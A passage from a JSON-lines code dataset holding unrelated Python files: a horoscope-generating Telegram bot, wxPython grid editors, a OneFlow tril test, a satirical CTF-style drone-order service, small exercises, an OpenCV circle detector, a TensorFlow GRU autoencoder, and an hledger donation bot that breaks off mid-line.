update[\"message\"][\"from\"][\"username\"]\n else:\n user = ''\n s = ''\n\n in_msgs = text.split()\n\n if 'yolanda' in in_msgs or \\\n 'yolianda' in in_msgs or \\\n '@yolianda' in in_msgs or \\\n '@yoliandabot' in in_msgs or \\\n 'predicción' in in_msgs or \\\n 'destino' in in_msgs:\n\n div_cmd = '/diversidad'\n div_par = 'diversity'\n mult_cmd = '/multiplicador'\n mult_par = 'multiplier'\n\n params = {}\n\n if div_cmd in in_msgs:\n params[div_par] = float(in_msgs[in_msgs.index(div_cmd)+1])\n params['new_'+div_par] = True\n\n if mult_cmd in in_msgs:\n params[mult_par] = float(in_msgs[in_msgs.index(mult_cmd)+1])\n params['new_'+mult_par] = True\n\n\n #print('debería responder')\n if first == True:\n first = False\n set_action(chat, 'typing')\n s = predictor.generate_text(**params)\n message = ''\n if params != {}:\n print(str(params))\n\n if random.randint(0,100) < 30:\n message += to + ': '\n message += utils.token_sequence_to_text([voc[i] for i in s])\n send_message(message, chat)\n else:\n message += utils.token_sequence_to_text([voc[i] for i in s])\n send_message_reply(message, chat, msg)\n \n with open('../log/yolianda_log','a') as outfile:\n outfile.write(chat)\n outfile.write(msg)\n outfile.write(user)\n outfile.write(message)\n print(chat,msg,user,message)\n else:\n #print('no debería responder')\n pass\n except Exception as e:\n with open('../log/yolianda_log','a') as outfile:\n outfile.write(str(update))\n outfile.write(str(e))\n print(update)\n print(e)\n pass\n \n\ndef main():\n print(TOKEN)\n print(URL)\n\n voc_file = '../data/horoscopo_5000_0300_voc.txt'\n voc = open(voc_file).read().split()\n voc_ind = dict((s,i) for i,s in enumerate(voc))\n\n model_file = '../models/lstm_model_170821.0948.h5'\n model = load_model(model_file)\n predictor = utils.PredictorParByParReal(model,voc,voc_ind,voc_ind[''])\n\n print(\"listoco!\")\n\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n handle_updates(updates, predictor, voc)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()","sub_path":"text_generator/src/predictobot.py","file_name":"predictobot.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"166372814","text":"\"\"\" This module defines several custom cell editors \"\"\"\n\nimport wx\nimport wx.adv\nfrom wx.grid import PyGridCellRenderer, PyGridCellEditor\n\nfrom hm.wxx.helper import wrapTextLines\nfrom hm.wxx.form.converter import date2wxdatetime\n\n\nclass GridCellAutoWrapStringRenderer(PyGridCellRenderer):\n \"\"\" Overwrites the default GridCellAutoWrapStringRenderer by honoring the\n Chinese text breaking rules \"\"\"\n def Draw(self, grid, attr, dc, rect, row, col, isSelected):\n dc.SetBackgroundMode(wx.SOLID)\n\n if grid.IsEnabled():\n if isSelected:\n if wx.Window.FindFocus() == grid.GetGridWindow():\n clr = grid.GetSelectionBackground()\n else:\n clr = wx.SystemSettings_GetColour(wx.SYS_COLOUR_BTNSHADOW)\n dc.SetBrush(wx.Brush(clr, wx.SOLID))\n dc.SetTextBackground(clr)\n dc.SetTextForeground(grid.GetSelectionForeground())\n else:\n dc.SetBrush(wx.Brush(attr.GetBackgroundColour(), wx.SOLID))\n dc.SetTextBackground(attr.GetBackgroundColour())\n dc.SetTextForeground(attr.GetTextColour())\n else:\n dc.SetBrush(wx.Brush(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE), wx.SOLID))\n dc.SetTextBackground(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE))\n dc.SetTextForeground(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_GRAYTEXT))\n\n # draw the background\n dc.SetPen(wx.TRANSPARENT_PEN)\n dc.DrawRectangleRect(rect)\n\n # draw the text\n dc.SetBackgroundMode(wx.TRANSPARENT)\n dc.SetFont(attr.GetFont())\n horizAlign, vertAlign = attr.GetAlignment()\n grid.DrawTextRectangle(\n dc, self.GetTextLines(grid, attr, dc, rect, row, col),\n rect, horizAlign, vertAlign)\n\n def GetTextLines(self, grid, attr, dc, rect, row, col):\n \"\"\" Is is called by GetBestSize and Draw method to split the text into\n multiple lines by inserting \\n in the appropriate places into the\n original cell string value. It will break a line at any position\n instead of word break so it is best used for breaking Chinese texts.\n\n Note the font for drawing and calculating best size is set here. \"\"\"\n text = grid.GetCellValue(row, col)\n if len(text) == 0:\n return ''\n\n font = attr.GetFont()\n if not font.IsOk():\n font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)\n dc.SetFont(font)\n\n autoWrap = grid.GetColumn(col).autoWrap\n return wrapTextLines(dc, rect.GetWidth(), text) if autoWrap else text\n\n def GetBestSize(self, grid, attr, dc, row, col):\n rect = wx.Rect(0, 0, grid.GetColSize(col) - 2, 14)\n text = self.GetTextLines(grid, attr, dc, rect, row, col)\n x, y, h = dc.GetMultiLineTextExtent(text)\n return (x, y)\n\n def Clone(self):\n return GridCellAutoWrapStringRenderer()\n\n\nclass GridCellAutoWrapStringEditor(PyGridCellEditor):\n def Create(self, parent, id, evtHandler):\n \"\"\" Called to create the control, which must derive from wx.Control.\n \"\"\"\n self._c = wx.TextCtrl(parent, id, style=wx.TE_MULTILINE)\n self.SetControl(self._c)\n\n # this one is important other wise EndEdit won't be invoked when mouse\n # is clicked out side of the grid\n if evtHandler:\n self._c.PushEventHandler(evtHandler)\n\n def SetSize(self, rect):\n \"\"\" Position/size the edit control within the cell rectangle.\n If you don't fill the cell (the rect) then be sure to override\n PaintBackground and do something meaningful there. \"\"\"\n self._c.SetDimensions(rect.x, rect.y, rect.width, rect.height)\n\n def BeginEdit(self, row, col, grid):\n \"\"\" Fetch the value from the table and prepare the edit control to begin\n editing. Set the focus to the edit control. \"\"\"\n self.startValue = grid.GetValueRaw(row, col)\n if self.startValue:\n self._c.SetOwnBackgroundColour(\n wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW))\n self._c.SetValue(self.startValue)\n self._c.SetFocus()\n self._c.SetInsertionPoint(0)\n\n def EndEdit(self, row, col, grid, oldVal):\n \"\"\" Complete the editing of the current cell. Returns True if the value\n has changed. If necessary, the control may be destroyed. \"\"\"\n changed = False\n\n val = self._c.GetValue()\n if val != self.startValue:\n changed = True\n grid.GetTable().SetValue(row, col, val) # update the table\n\n self.startValue = None\n # After we finish, the control should be cleared so that value from\n # previous editing will not be carried over to new empty cell\n self._c.Clear()\n return changed\n\n def Reset(self):\n \"\"\" Reset the value in the control back to its starting value. \"\"\"\n self._c.SetValue(self.startValue)\n\n def IsAcceptedKey(self, evt):\n \"\"\" Return True to allow the given key to start editing: the base class\n version only checks that the event has no modifiers. F2 is special\n and will always start the editor. \"\"\"\n return (not (evt.ControlDown() or evt.AltDown()) and\n evt.GetKeyCode() != wx.WXK_SHIFT)\n\n def Destroy(self):\n \"\"\" final cleanup \"\"\"\n self.base_Destroy()\n\n def Clone(self):\n \"\"\" Create a new object which is the copy of this one \"\"\"\n return GridCellAutoWrapStringEditor()\n\n\nclass GridCellDateEditor(PyGridCellEditor):\n \"\"\" This wraps DatePickerCtrl with a dropdown control as a grid custom\n editor \"\"\"\n def __init__(self, allowNone=False):\n self.allowNone = allowNone\n super(GridCellDateEditor, self).__init__()\n\n def Create(self, parent, id, evtHandler):\n \"\"\" Called to create the control, which must derive from wx.Control.\n \"\"\"\n style = wx.DP_DROPDOWN\n if self.allowNone:\n style = style | wx.DP_ALLOWNONE\n self._c = wx.adv.DatePickerCtrl(\n parent, id, size=(110, -1), style=style)\n self.SetControl(self._c)\n\n if evtHandler:\n self._c.PushEventHandler(evtHandler)\n\n def Show(self, show, attr):\n \"\"\" Show or hide the edit control. You can use the attr (if not None)\n to set colours or fonts for the control. \"\"\"\n super(GridCellDateEditor, self).Show(show)\n\n def SetSize(self, rect):\n \"\"\" Position/size the edit control within the cell rectangle.\n If you don't fill the cell (the rect) then be sure to override\n PaintBackground and do something meaningful there. \"\"\"\n w, h = self._c.GetSizeTuple()\n w, h = max(w, rect.width + 2), max(h, rect.height + 2)\n self._c.SetDimensions(rect.x, rect.y, w, h, wx.SIZE_ALLOW_MINUS_ONE)\n\n def BeginEdit(self, row, col, grid):\n \"\"\" Fetch the value from the table and prepare the edit control\n to begin editing. Set the focus to the edit control. \"\"\"\n self.startValue = grid.GetValueRaw(row, col)\n if self.startValue:\n self.startValue = date2wxdatetime(self.startValue)\n self._c.SetValue(self.startValue)\n self._c.SetFocus()\n\n def EndEdit(self, row, col, grid, oldVal):\n \"\"\" Complete the editing of the current cell. Returns True if the value\n has changed. If necessary, the control may be destroyed. \"\"\"\n changed = False\n\n val = self._c.GetValue()\n if val != self.startValue:\n changed = True\n grid.GetTable().SetValue(row, col, val) # update the table\n\n self.startValue = None\n return changed\n\n def Reset(self):\n \"\"\" Reset the value in the control back to its starting value. \"\"\"\n self._c.SetValue(self.startValue)\n\n def IsAcceptedKey(self, evt):\n \"\"\" Return True to allow the given key to start editing: the base class\n version only checks that the event has no modifiers. F2 is special\n and will always start the editor. \"\"\"\n return (not (evt.ControlDown() or evt.AltDown()) and\n evt.GetKeyCode() != wx.WXK_SHIFT)\n\n def Destroy(self):\n \"\"\" final cleanup \"\"\"\n self.base_Destroy()\n\n def Clone(self):\n \"\"\" Create a new object which is the copy of this one \"\"\"\n return GridCellDateEditor()\n","sub_path":"hm/wxx/grid/celleditors.py","file_name":"celleditors.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"427514186","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom collections import OrderedDict\nimport numpy as np\nimport oneflow as flow\nfrom test_util import (\n GenArgDict,\n test_global_storage,\n type_name_to_flow_type,\n type_name_to_np_type,\n)\nimport oneflow.typing as oft\n\n\ndef _test_tril_fw_bw(test_case, device, shape, type_name, diagonal=0):\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float)\n\n if type_name == \"float16\":\n flow_type = flow.float\n np_type = np.float32\n else:\n flow_type = type_name_to_flow_type[type_name]\n np_type = type_name_to_np_type[type_name]\n\n @flow.global_function(type=\"train\", function_config=func_config)\n def test_tril_fw_bw_job(x: oft.Numpy.Placeholder(shape, dtype=flow_type),):\n with flow.scope.placement(device, \"0:0\"):\n x_var = flow.get_variable(\n name=\"xv\",\n shape=(1,),\n dtype=flow.float,\n initializer=flow.zeros_initializer(),\n )\n x += flow.cast(x_var, dtype=flow_type)\n if type_name == \"float16\":\n out = flow.cast(\n flow.math.tril(flow.cast(x, flow.float16), diagonal), flow.float\n )\n else:\n out = flow.math.tril(x, diagonal)\n flow.optimizer.SGD(\n flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0\n ).minimize(out)\n\n flow.watch(x, test_global_storage.Setter(\"x\"))\n flow.watch_diff(x, test_global_storage.Setter(\"x_diff\"))\n flow.watch(out, test_global_storage.Setter(\"out\"))\n flow.watch_diff(out, test_global_storage.Setter(\"out_diff\"))\n return out\n\n check_point = flow.train.CheckPoint()\n check_point.init()\n x = np.random.randint(low=0, high=100, size=shape)\n test_tril_fw_bw_job(x.astype(np_type)).get()\n\n np_out = np.tril(test_global_storage.Get(\"x\"), diagonal)\n np_x_diff = np.tril(test_global_storage.Get(\"out_diff\"), diagonal)\n\n if type_name == \"float16\":\n tolerance = 1e-3\n else:\n tolerance = 1e-5\n test_case.assertTrue(\n np.allclose(\n np_out, test_global_storage.Get(\"out\"), rtol=tolerance, atol=tolerance\n )\n )\n test_case.assertTrue(\n np.allclose(\n np_x_diff, test_global_storage.Get(\"x_diff\"), rtol=tolerance, atol=tolerance\n )\n )\n\n\ndef test_tril_fw_bw(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"device\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"type_name\"] = [\"float32\", \"float16\", \"double\", \"int8\", \"int32\", \"int64\"]\n arg_dict[\"shape\"] = [(6, 6), (3, 6, 8), (3, 4, 8, 6)]\n arg_dict[\"diagonal\"] = [-8, -1, 0, 1, 8]\n\n for arg in GenArgDict(arg_dict):\n if arg[\"device\"] == \"cpu\" and arg[\"type_name\"] == \"float16\":\n continue\n _test_tril_fw_bw(test_case, **arg)\n","sub_path":"oneflow/python/test/ops/test_tril.py","file_name":"test_tril.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"229626317","text":"import json\nimport os\nimport re\nimport stat\nimport sys\n\nfrom api import encode_parameters, decode_parameters\nfrom utils import clear_screen, read_prompt, hit_enter, hashify, base32, read_secret\n\n\nCREECH_LOGO = \"\"\"\n ____ _ \n / ___|_ __ ___ ___ ___| |__ \n | | | '__/ _ \\/ _ \\/ __| '_ \\ \n | |___| | | __/ __/ (__| | | |\n \\____|_| \\___|\\___|\\___|_| |_|\n\n U.S. Air Force Base, Nevada, USA.\n \n\"\"\"[1:]\n\nMAIN_SCREEN = \"\"\"\nWelcome soldier!\n\n1. Get permission for drone operation\n2. Leave Creech\n\"\"\".lstrip()\n\nPERMISSION_SCREEN = \"\"\"\nChoose drone operation (trace, kill, peace):\n\"\"\".lstrip()\n\n\nNAME_RE = re.compile('^[a-zA-Z]+ [a-zA-Z]+$')\n\n\nclass Creech:\n def __init__(self, base_dir):\n self.base_dir = base_dir\n self.secret_key = read_secret(os.path.join(base_dir, 'rw', 'config', 'creech.ini'))\n\n def run(self):\n while True:\n clear_screen()\n if not self._main_screen():\n break\n\n\n def _main_screen(self):\n \"\"\"Main screen. This is what you get when you visit Creech. \"\"\"\n sys.stdout.write(CREECH_LOGO)\n sys.stdout.write(MAIN_SCREEN)\n no = read_prompt()\n if no == '1':\n self._get_permission()\n elif no == '2':\n return False\n return True\n\n\n def _get_permission(self):\n \"\"\"Ask the soldier for details about his planned operation.\n\n The soldiers asks for permission to execute a specific drone operation.\n He can choose if he want to trace or kill the terrorist. If HIS drone\n operation was already executed he can also ask for the results of the\n operation.\n\n The supervisor will give a signed order if he permits the operation.\n This order can be given to Ramstein to execute the operation.\n\n Since we are in the war of terror permission is likely to be given.\n \"\"\"\n clear_screen()\n sys.stdout.write(CREECH_LOGO)\n sys.stdout.write(PERMISSION_SCREEN)\n operation = read_prompt()\n if operation not in ('trace', 'kill', 'peace'):\n sys.stdout.write('Are you too stupid? Army has seen better soldiers than you!\\n')\n self._dismiss()\n return\n if operation == 'peace':\n sys.stdout.write('This is WAR on terror, not peace on terror!\\n')\n sys.stdout.write('We have to creat^W kill more terrorists.\\n')\n self._dismiss()\n return\n elif operation in ('trace', 'kill'):\n if operation == 'trace':\n sys.stdout.write('Which terrorist should be traced?\\n')\n elif operation == 'kill':\n sys.stdout.write('Which terrorist should be killed?\\n')\n terrorist = read_prompt()\n if terrorist.lower() == 'obama':\n sys.stdout.write('Did you mean Osama? [yes/no]\\n')\n if read_prompt().lower() != 'yes':\n sys.stdout.write('Idiot! This is our president.\\n')\n sys.stdout.write('[mumbles to himself: He might be a terrorist too]\\n')\n self._dismiss()\n return\n else:\n sys.stdout.write('He was already murdered, but I guess there are more Osamas.\\n')\n sys.stdout.write('\\n')\n if os.path.exists(self._get_operation_filename(terrorist)):\n sys.stdout.write('There is already an ongoing operation against {}.\\n'.format(terrorist))\n sys.stdout.write('Anyway, thank you helping us in our war on terror.\\n')\n hit_enter()\n return\n\n\n sys.stdout.write('Secret notes regarding this target?\\n')\n notes = read_prompt()\n\n operation_data = {\n 'operation': operation,\n 'terrorist': terrorist,\n 'notes': notes\n }\n self._store_operation(operation_data)\n self._grant_permission(operation, terrorist)\n\n def _grant_permission(self, operation, terrorist):\n \"\"\"Grants permission to an operation.\n\n The soldiers gets a signed order which can be passed to Ramstein to\n execute the drone operation.\n \"\"\"\n order = base32(encode_parameters(self.secret_key, {\n 'operation': operation,\n 'terrorist': terrorist\n }))\n order_getresult = base32(encode_parameters(self.secret_key, {\n 'operation': 'getresult',\n 'terrorist': terrorist\n }))\n\n sys.stdout.write('\\nPermission granted!\\n\\n')\n sys.stdout.write('{} order: '.format(operation))\n sys.stdout.write(order)\n sys.stdout.write('\\ngetresult order: ')\n sys.stdout.write(order_getresult)\n sys.stdout.write('\\n\\nYou can use these signed orders in Ramstein!\\n')\n sys.stdout.write('The first order can be used to execute the drone operation.\\n')\n sys.stdout.write('The second order can be used to retrieve the results.\\n')\n hit_enter()\n\n def _dismiss(self):\n \"\"\" The soldier misbehaved. Either return him or kill his connection. \"\"\"\n sys.stdout.write('Dismiss!\\n')\n sys.stdout.write(' [colleague whispers to you: Say \"Affirmative!\"]\\n')\n if read_prompt().lower() != 'affirmative!':\n sys.exit(1)\n\n #\n # Utility functions\n #\n\n def _store_operation(self, operation_data):\n filename = self._get_operation_filename(operation_data['terrorist'])\n with open(filename, 'w') as f:\n os.fchmod(f.fileno(), stat.S_IRUSR | stat.S_IWUSR)\n json.dump(operation_data, f)\n\n def _load_operation(self, terrorist):\n filename = self._get_operation_filename(terrorist)\n try:\n with open(filename, 'r') as f:\n return json.load(f)\n except IOError:\n return None\n\n def _get_operation_filename(self, terrorist):\n return os.path.join(self.base_dir, 'rw', 'operations',\n hashify(self.secret_key, terrorist) + '.json')\n","sub_path":"KaaS/ro/creech.py","file_name":"creech.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"641970543","text":"#!/usr/bin/env python3\n\n## read a list of numbers\n## for each number print the corresponding\n## person's name from the list\n\npeople = ['fred',\n 'betty',\n 'barney',\n 'dino',\n 'wilma',\n 'pebbles',\n 'bamm-bamm']\n\nprint(\"Enter a list of numbers: \")\n\nindices = []\nwhile True:\n try:\n indices.append(int(input()))\n except:\n break\n\nprint()\nfor idx in indices:\n if idx < 1 or idx > len(indices): continue\n\n print(\"{}\".format(people[idx - 1]))\n\n","sub_path":"ch2/exo2.py","file_name":"exo2.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"473736367","text":"\r\n\r\nNumber = float(input(\"What's your number: \"))\r\nModulus = Number%2\r\nModulus_four = Number%4\r\nif Modulus == 0:\r\n print(\"Even Number.\")\r\n if Modulus_four == 0:\r\n print(\"It's also multiple of 4 !!\")\r\nelse:\r\n print(\"Odd\")\r\n","sub_path":"Exercise25_Guessing Game Two.py","file_name":"Exercise25_Guessing Game Two.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"460992530","text":"import cv2\nimport numpy as np\nfor i in range(0,19):\n img = cv2.imread('edcurrent\\\\cropimage'+str(i)+'_onlyhead.jpg', 0)\n print('edcurrent\\\\cropimage'+str(i)+'_onlyhead.jpg')\n print('\\n',img.shape)\n img = cv2.medianBlur(img, 5)\n cimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 35,\n param1=20, param2=8, minRadius=5, maxRadius=13)\n if circles is not None:\n circles = np.uint16(np.around(circles))\n print(circles.shape,'\\n',len(img))\n for i in circles[0, :]:\n # draw the outer circle\n cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)\n # draw the center of the circle\n cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)\n\n cv2.imshow('detected circles', cimg)\n cv2.waitKey(1000)\n cv2.destroyAllWindows()\n","sub_path":"HoughCircles.py","file_name":"HoughCircles.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"526034708","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom fetch_data import get_data\n\n\ndef main(_):\n\n path_to_data_folder = './data/'\n\n window_size = 256\n smooth_size = 4\n matrix_size = int(window_size/smooth_size) + int((window_size - smooth_size/2)/smooth_size)\n\n ## get_data() should return :\n ## - X_train and X_test as lists of feature matrices of shape (35 , 256)\n ## - Y_train and Y_test as lists of labels (encoded as one-hot vectors)\n X_train, Y_train, X_test, Y_test = get_data(path_to_data_folder)\n\n n_features = len(X_train[0][0])\n n_clients = len(Y_train[0])\n\n dim_gru_1 = 256 # number of units of gru_1\n dim_gru_2 = 256 # number of units of gru_2\n dim_fc1 = 50 # number of units of fc1\n auto_lamb = 1e-7 # regularisation factor in autoencoder loss\n\n batch_size = 20\n epoch = 30\n\n x = tf.placeholder(tf.float32, [None, matrix_size, n_features])\n y = tf.placeholder(tf.float32, [None, n_clients])\n\n ## GRU layers\n stacked_gru = tf.contrib.rnn.MultiRNNCell([tf.nn.rnn_cell.GRUCell(dim_gru_1), tf.nn.rnn_cell.GRUCell(dim_gru_2)])\n stacked_gru_outputs, final_state = tf.nn.dynamic_rnn(stacked_gru, x, dtype=tf.float32)\n\n ## We take the last prediction of the stacked gru as input of dropout layer\n gru_outputs = tf.transpose(stacked_gru_outputs, [1, 0, 2])\n last_gru_output = tf.gather(gru_outputs, int(gru_outputs.get_shape()[0]) - 1)\n\n ## DROPOUT layer\n keep_prob = tf.placeholder(tf.float32)\n dropout = tf.nn.dropout(last_gru_output, keep_prob)\n\n ## AUTOENCODER layers\n fc1_weight = tf.Variable(tf.truncated_normal([dim_gru_2, dim_fc1]))\n fc1_bias = tf.Variable(tf.constant(0.1, shape=[dim_fc1]))\n fc1_output = tf.nn.relu(tf.matmul(dropout, fc1_weight) + fc1_bias)\n\n fc2_weight = tf.Variable(tf.truncated_normal([dim_fc1, dim_gru_2]))\n fc2_bias = tf.Variable(tf.constant(0.1, shape=[dim_gru_2]))\n fc2_output = tf.nn.tanh(tf.matmul(fc1_output, fc2_weight) + fc2_bias)\n\n ## AUTOENCODER loss\n autoencoder_reg = auto_lamb * tf.norm(fc1_output, ord=1, axis=1)\n autoencoder_loss = tf.norm(tf.subtract(fc2_output, dropout), ord=2, axis=1)\n autoencoder_total_loss = tf.reduce_mean(autoencoder_loss + autoencoder_reg)\n\n ## CLASSIFICATION layers\n fc3_weight = tf.Variable(tf.truncated_normal([dim_gru_2, int(y.get_shape()[1])]))\n fc3_bias = tf.Variable(tf.constant(0.1, shape=[y.get_shape()[1]]))\n fc3_output = tf.matmul(dropout, fc3_weight) + fc3_bias\n\n ## CLASSIFICATION loss\n softmax_losses = tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=fc3_output)\n softmax_mean_loss = tf.reduce_mean(softmax_losses)\n\n ## GLOBAL LOSS and accuracy\n total_loss = softmax_mean_loss + autoencoder_total_loss\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(fc3_output, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n train_step = tf.train.AdamOptimizer(1e-3).minimize(total_loss)\n\n sess = tf.Session()\n init_op = tf.initialize_all_variables()\n sess.run(init_op)\n\n no_of_batches = int(len(X_train) / batch_size)\n\n ## TRAINING\n for i in range(epoch):\n X_train, Y_train = shuffle(X_train, Y_train)\n ptr = 0\n for j in range(no_of_batches):\n inp, out = X_train[ptr:ptr + batch_size], Y_train[ptr:ptr + batch_size]\n ptr += batch_size\n sess.run(train_step, feed_dict={x: inp, y: out, keep_prob: 0.5})\n\n if j % 100 == 1:\n fc1_out, test_accuracy = sess.run([fc1_output, accuracy], feed_dict={x: X_test, y: Y_test, keep_prob: 1})\n non_zero_elements = fc1_out[np.nonzero(fc1_out)]\n print (non_zero_elements.size)\n print(\"fc1_outputs = \")\n print(fc1_out) # it tends to become a zero vector from epoch [5, 10]\n print(\"Epoch: \" + str(i) +\n \", iter: \" + str(i*no_of_batches + j) +\n \" Testing Accuracy= {:.5f}\".format(test_accuracy))\n sess.close()\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"639048026","text":"import datetime\nimport glob\nimport logging\nimport os\nfrom typing import Dict, Generic, List, Literal, NewType, Optional, Tuple, TypeVar, TypedDict, Union\n\nimport requests\nfrom telegram import Update\nfrom telegram.ext import CallbackContext, CommandHandler, Updater\nfrom telegram.files.location import Location\nfrom telegram.files.venue import Venue\nfrom telegram.parsemode import ParseMode\n\nlogger = logging.getLogger()\n\nTOKEN = os.environ[\"TOKEN\"]\nURL_HLEDGER = os.environ[\"URL_HLEDGER\"]\n\nHLedgerCommoditySymbol = NewType(\"HLedgerCommoditySymbol\", str)\nHLedgerAccountName = NewType(\"HLedgerAccountName\", str)\nHLedgerTag = NewType(\"HLedgerTag\", Tuple[str, str])\nHLedgerFormatedDate = NewType(\"HLedgerFormatedDate\", str)\n\n\ndef to_hledger_date(date: datetime.datetime) -> HLedgerFormatedDate:\n return HLedgerFormatedDate(date.strftime(\"%Y-%m-%d\"))\n\n\nBRL = HLedgerCommoditySymbol(\"BRL\")\nKaristonAccount = HLedgerAccountName(\"KaristonAccount\")\n\n\nclass AmountPrecision(TypedDict):\n tag: Union[Literal[\"NaturalPrecision\"]]\n contents: Tuple\n\n\ndef build_amount_precision() -> AmountPrecision:\n return AmountPrecision(\n contents=(),\n tag=\"NaturalPrecision\"\n )\n\n\nclass HLedgerAmountStyle(TypedDict):\n ascommodityside: Union[Literal[\"L\", \"R\"]]\n ascommodityspaced: bool\n asprecision: AmountPrecision\n asdecimalpoint: None\n asdigitgroups: Tuple[str, List[int]]\n\n\ndef build_amount_style() -> HLedgerAmountStyle:\n return HLedgerAmountStyle(\n ascommodityside=\"L\",\n ascommodityspaced=True,\n asprecision=build_amount_precision(),\n asdecimalpoint=None,\n asdigitgroups=(\",\", [3])\n )\n\n\nclass HLedgerQuantity(TypedDict):\n floatingPoint: float\n decimalPlaces: int\n decimalMantissa: int\n\n\ndef to_hledger_quantity(value: float) -> HLedgerQuantity:\n return HLedgerQuantity(\n floatingPoint=value,\n decimalMantissa=int(value * 100),\n decimalPlaces=2\n )\n\n\nclass HLedgerAmount(TypedDict):\n acommodity: HLedgerCommoditySymbol\n aquantity: HLedgerQuantity\n aismultiplier: bool\n astyle: HLedgerAmountStyle\n aprice: None\n\n\ndef build_amount(quantity: float) -> HLedgerAmount:\n return HLedgerAmount(\n acommodity=BRL,\n aquantity=to_hledger_quantity(quantity),\n aismultiplier=False,\n astyle=build_amount_style(),\n aprice=None,\n )\n\n\nclass HLedgerTPosting(TypedDict):\n pdate: Optional[HLedgerFormatedDate]\n pdate2: Optional[HLedgerFormatedDate]\n pstatus: Union[\n Literal[\n \"Unmarked\",\n \"Pending\",\n \"Cleared\"\n ]\n ]\n paccount: HLedgerAccountName\n pamount: List[HLedgerAmount]\n pcomment: str\n ptype: Union[\n Literal[\n \"RegularPosting\",\n \"VirtualPosting\",\n \"BalancedVirtualPosting\"\n ]\n ]\n ptags: List[HLedgerTag]\n pbalanceassertion: None\n ptransaction: None\n poriginal: None\n\n\ndef build_posting(account: HLedgerAccountName, quantity: float) -> HLedgerTPosting:\n return HLedgerTPosting(\n pdate=None,\n pdate2=None,\n pstatus=\"Unmarked\",\n paccount=account,\n pamount=[build_amount(quantity)],\n pcomment=\"\",\n ptype=\"RegularPosting\",\n ptags=[],\n pbalanceassertion=None,\n ptransaction=None,\n poriginal=None,\n )\n\n\nclass HLedgerJournalSourcePos(TypedDict):\n contents: Tuple[str, Tuple[int, int]]\n tag: Literal[\"JournalSourcePos\"]\n\n\ndef build_source_pos() -> HLedgerJournalSourcePos:\n return HLedgerJournalSourcePos(\n contents=(\"\", (1, 1)),\n tag=\"JournalSourcePos\"\n )\n\n\nclass HLedgerTransaction(TypedDict):\n tindex: int\n tprecedingcomment: str\n tsourcepos: HLedgerJournalSourcePos\n tdate: HLedgerFormatedDate\n tdate2: None\n tstatus: Union[\n Literal[\"Unmarked\"],\n Literal[\"Pending\"],\n Literal[\"Cleared\"]\n ]\n tcode: str\n tdescription: str\n tcomment: str\n ttags: List[HLedgerTag]\n tpostings: List[HLedgerTPosting]\n\n\ndef build_transaction(\n description: str,\n tags: Dict[str, str],\n account_a: HLedgerAccountName,\n account_b: HLedgerAccountName,\n value: float\n) -> HLedgerTransaction:\n return HLedgerTransaction(\n tindex=0,\n tprecedingcomment=\"\",\n tsourcepos=build_source_pos(),\n tdate=to_hledger_date(datetime.datetime.utcnow()),\n tdate2=None,\n tstatus=\"Unmarked\",\n tcode=\"\",\n tdescription=description,\n tcomment=\"\",\n ttags=[HLedgerTag((tag, value)) for tag, value in tags.items()],\n tpostings=[\n build_posting(account_a, -value),\n build_posting(account_b, value),\n ],\n )\n\n\ndef add_new_donation(update: Update, context: CallbackContext):\n if update.effective_user:\n donation_transaction: HLedgerTransaction = build_transaction(\n account_b=KaristonAccount,\n account_a=HLedgerAccountName(\n f\"member::{update.effective_user.first_name}_{update.effective_user.last_name}\"\n ),\n tags={\n \"type\": \"donation\",\n \"member\": update.effective_user.full_name\n },\n description=f\"Donation from {update.effective_user.full_name}\",\n value=10\n )\n response = 